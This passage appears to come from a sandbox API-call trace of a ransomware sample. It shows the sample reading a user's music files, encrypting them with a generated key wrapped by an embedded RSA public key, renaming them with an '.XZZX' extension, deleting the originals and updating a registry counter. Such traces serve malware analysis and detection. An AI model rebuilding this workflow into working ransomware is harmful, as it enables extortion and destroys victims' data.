hFile=0x558, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x9242 [0118.137] WriteFile (in: hFile=0x558, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x20, lpOverlapped=0x0) returned 1 [0118.137] SetFilePointer (in: hFile=0x558, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x9262 [0118.137] WriteFile (in: hFile=0x558, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0118.137] SetFilePointer (in: hFile=0x558, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x9267 [0118.137] SetErrorMode (uMode=0x1) returned 0x1 [0118.137] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0118.137] OutputDebugStringW (lpOutputString="end") [0118.137] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x08\x86Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0118.137] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0118.137] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3cc6218) returned 1 [0118.138] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc6218, dwCertEncodingType=0x1, pInfo=0x3cb0cd8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cb0d08*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cb0d10*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3a5950) returned 1 [0118.138] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0118.138] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0118.138] CryptEncrypt (in: hKey=0x3a5950, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0118.138] CryptEncrypt (in: hKey=0x3a5950, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc62a0*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc62a0*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0118.138] WriteFile (in: hFile=0x558, lpBuffer=0x3cc62a0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3cc62a0*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0118.139] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0118.139] WriteFile (in: hFile=0x558, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0118.139] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0118.139] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0118.139] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x560) returned 0x0 [0118.139] RegQueryValueExW (in: hKey=0x560, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0x71, lpcbData=0x420dfdc*=0x4) returned 0x0 [0118.139] RegCloseKey (hKey=0x560) returned 0x0 [0118.139] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x560) returned 0x0 [0118.139] RegSetValueExW (in: hKey=0x560, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0x72, cbData=0x4 | out: lpData=0x420dfec*=0x72) returned 0x0 [0118.139] RegCloseKey (hKey=0x560) returned 0x0 [0118.139] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.139] VirtualFree (lpAddress=0x40e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.140] CloseHandle (hObject=0x558) returned 1 [0118.140] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0118.141] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0118.141] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\jtsnNF8Wy Jt.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\jtsnnf8wy jt.m4a")) returned 1 [0118.142] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\jtsnNF8Wy Jt.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\jtsnnf8wy jt.m4a")) returned 0 Thread: id = 378 os_tid = 0x8f0 [0118.161] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0118.161] lstrcpyW (in: lpString1=0x420f460, lpString2="LuguQ9Fu8UwQPMQRFj.m4a" | out: lpString1="LuguQ9Fu8UwQPMQRFj.m4a") returned="LuguQ9Fu8UwQPMQRFj.m4a" [0118.161] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0118.161] SetErrorMode (uMode=0x1) returned 0x1 [0118.161] lstrcpyW (in: lpString1=0x420f860, lpString2="LuguQ9Fu8UwQPMQRFj.m4a" | out: lpString1="LuguQ9Fu8UwQPMQRFj.m4a") returned="LuguQ9Fu8UwQPMQRFj.m4a" [0118.161] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x8ebc635b, Data2=0x2913, Data3=0x4cae, Data4=([0]=0x99, [1]=0xb1, [2]=0x73, [3]=0xa, [4]=0x74, [5]=0xa6, [6]=0xb3, [7]=0xb4))) returned 0x0 [0118.161] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\LuguQ9Fu8UwQPMQRFj.m4a") returned 95 [0118.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0118.161] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\C3E4F2C10C4D8EEA8EBC635B106E7332.XZZX") returned 110 [0118.161] StrStrW (lpFirst="LuguQ9Fu8UwQPMQRFj.m4a", lpSrch="XZZX") returned 0x0 [0118.161] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\LuguQ9Fu8UwQPMQRFj.m4a", dwFileAttributes=0x20) returned 1 [0118.161] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\LuguQ9Fu8UwQPMQRFj.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\luguq9fu8uwqpmqrfj.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x55c [0118.161] ReadFile (in: hFile=0x55c, lpBuffer=0x3cc9980, nNumberOfBytesToRead=0x8f09, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x3cc9980*, lpNumberOfBytesRead=0x420e418*=0x8f09, lpOverlapped=0x0) returned 1 [0118.162] CloseHandle (hObject=0x55c) returned 1 [0118.162] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0118.163] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40e0000 [0118.163] SetErrorMode (uMode=0x1) returned 0x1 [0118.163] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0118.163] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cc6328) returned 1 [0118.165] CryptGenKey (in: hProv=0x3cc6328, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3a5710) returned 1 [0118.316] CryptExportKey (in: hKey=0x3a5710, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0118.316] CryptExportKey (in: hKey=0x3a5710, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40e0000, pdwDataLen=0x420e41c | out: pbData=0x40e0000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0118.317] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0118.317] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0118.317] CryptDestroyKey (hKey=0x3a5710) returned 1 [0118.317] CryptReleaseContext (hProv=0x3cc6328, dwFlags=0x0) returned 1 [0118.317] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\C3E4F2C10C4D8EEA8EBC635B106E7332.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\c3e4f2c10c4d8eea8ebc635b106e7332.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x55c [0118.317] WriteFile (in: hFile=0x55c, lpBuffer=0x3cc9980*, nNumberOfBytesToWrite=0x8f09, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3cc9980*, lpNumberOfBytesWritten=0x420e438*=0x8f09, lpOverlapped=0x0) returned 1 [0118.318] SetFilePointer (in: hFile=0x55c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8f09 [0118.318] WriteFile (in: hFile=0x55c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0118.318] SetFilePointer (in: hFile=0x55c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8f0e [0118.318] WriteFile (in: hFile=0x55c, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x2c, lpOverlapped=0x0) returned 1 [0118.318] SetFilePointer (in: hFile=0x55c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8f3a [0118.319] WriteFile (in: hFile=0x55c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0118.319] SetFilePointer (in: hFile=0x55c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8f3f [0118.319] SetErrorMode (uMode=0x1) returned 0x1 [0118.319] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0118.319] OutputDebugStringW (lpOutputString="end") [0118.319] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x08\x86Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0118.319] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0118.319] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3cc6328) returned 1 [0118.319] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc6328, dwCertEncodingType=0x1, pInfo=0x3cb0da8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cb0dd8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cb0de0*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3a5990) returned 1 [0118.319] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0118.320] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0118.320] CryptEncrypt (in: hKey=0x3a5990, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0118.320] CryptEncrypt (in: hKey=0x3a5990, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc63b0*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc63b0*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0118.320] WriteFile (in: hFile=0x55c, lpBuffer=0x3cc63b0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3cc63b0*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0118.320] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0118.320] WriteFile (in: hFile=0x55c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0118.320] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0118.320] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0118.320] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x564) returned 0x0 [0118.320] RegQueryValueExW (in: hKey=0x564, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0x72, lpcbData=0x420dfdc*=0x4) returned 0x0 [0118.320] RegCloseKey (hKey=0x564) returned 0x0 [0118.321] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x564) returned 0x0 [0118.321] RegSetValueExW (in: hKey=0x564, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0x73, cbData=0x4 | out: lpData=0x420dfec*=0x73) returned 0x0 [0118.321] RegCloseKey (hKey=0x564) returned 0x0 [0118.321] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.321] VirtualFree (lpAddress=0x40e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.321] CloseHandle (hObject=0x55c) returned 1 [0118.322] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0118.322] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0118.322] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\LuguQ9Fu8UwQPMQRFj.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\luguq9fu8uwqpmqrfj.m4a")) returned 1 [0118.323] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\LuguQ9Fu8UwQPMQRFj.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\luguq9fu8uwqpmqrfj.m4a")) returned 0 Thread: id = 379 os_tid = 0x8f4 [0118.325] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0118.325] lstrcpyW (in: lpString1=0x420f460, lpString2="OPPnhBe-ZTrVhEG421.wav" | out: lpString1="OPPnhBe-ZTrVhEG421.wav") returned="OPPnhBe-ZTrVhEG421.wav" [0118.325] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0118.325] SetErrorMode (uMode=0x1) returned 0x1 [0118.325] lstrcpyW (in: lpString1=0x420f860, lpString2="OPPnhBe-ZTrVhEG421.wav" | out: lpString1="OPPnhBe-ZTrVhEG421.wav") returned="OPPnhBe-ZTrVhEG421.wav" [0118.325] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x340de035, Data2=0xa026, Data3=0x43a7, Data4=([0]=0xbe, [1]=0x1a, [2]=0xdc, [3]=0x64, [4]=0xa8, [5]=0xb, [6]=0xf7, [7]=0x3d))) returned 0x0 [0118.325] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\OPPnhBe-ZTrVhEG421.wav") returned 95 [0118.325] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0118.325] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\663067DE2A526ACA340DE0352E734F12.XZZX") returned 110 [0118.325] StrStrW (lpFirst="OPPnhBe-ZTrVhEG421.wav", lpSrch="XZZX") returned 0x0 [0118.325] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\OPPnhBe-ZTrVhEG421.wav", dwFileAttributes=0x20) returned 1 [0118.325] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\OPPnhBe-ZTrVhEG421.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\oppnhbe-ztrvheg421.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x560 [0118.325] ReadFile (in: hFile=0x560, lpBuffer=0x3cc9980, nNumberOfBytesToRead=0x9008, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x3cc9980*, lpNumberOfBytesRead=0x420e418*=0x9008, lpOverlapped=0x0) returned 1 [0118.327] CloseHandle (hObject=0x560) returned 1 [0118.327] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0118.327] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40e0000 [0118.328] SetErrorMode (uMode=0x1) returned 0x1 [0118.328] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0118.328] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cc6438) returned 1 [0118.330] CryptGenKey (in: hProv=0x3cc6438, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3a5710) returned 1 [0118.584] CryptExportKey (in: hKey=0x3a5710, hExpKey=0x0, 